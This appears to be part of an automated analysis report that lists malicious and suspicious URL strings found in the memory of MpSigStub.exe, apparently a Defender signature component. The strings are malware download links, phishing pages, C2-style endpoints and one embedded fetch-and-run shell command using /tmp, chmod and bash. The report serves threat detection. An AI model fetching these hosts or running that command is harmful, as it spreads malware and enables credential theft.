Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://keyba01se.usa.cc/ktg.doc
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://kiranacorp.com/oja
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://kovpro.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://l1ke.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lapapahoster.com/safe_download/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://lazexpo.info/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://libre-templates.ddns.net/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://lifehealthcareindia.com/google/google.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://lithi.io/file/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://lolitaadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://loygf-99.gq/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://lychee22.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://mail.vodafone.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htaanyinwa.hta
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htazeco.hta
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://manage1lnk.pw
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://maplestory.nexon.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://maq.com.pk/wehsd
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://maribit.com/count11.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://mastic52.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://mediasportal.com/phandler.php?sid=500&aid=281&said=9&pn=2&pid=3
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://megatoolbar.net/inetcreative/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://melmat.cf/obago.doc
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://members.giftera.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://members.xoom.com/devsfort/index.html
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://members.xoom.com/devsfort/index.htmlg
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://metznr.co/tor/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&amp;code=7867213
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://moffice.mrface.com/office.sct
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://moha-group.ir/nazy/doc/neworder.doc
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://monergismbooks.com/upgrade/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://movie.blogdns.org/asd
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://movie.daum.net/activeX/downloader/NcgAgentPOT_Setup.exe
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6298673850.00000197A43C2000.00000004.00000001.sdmp String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://mrbfile.xyz
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://mrbftp.xyz
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://ms365box.com/update.1
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://msiesettings.com/check/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
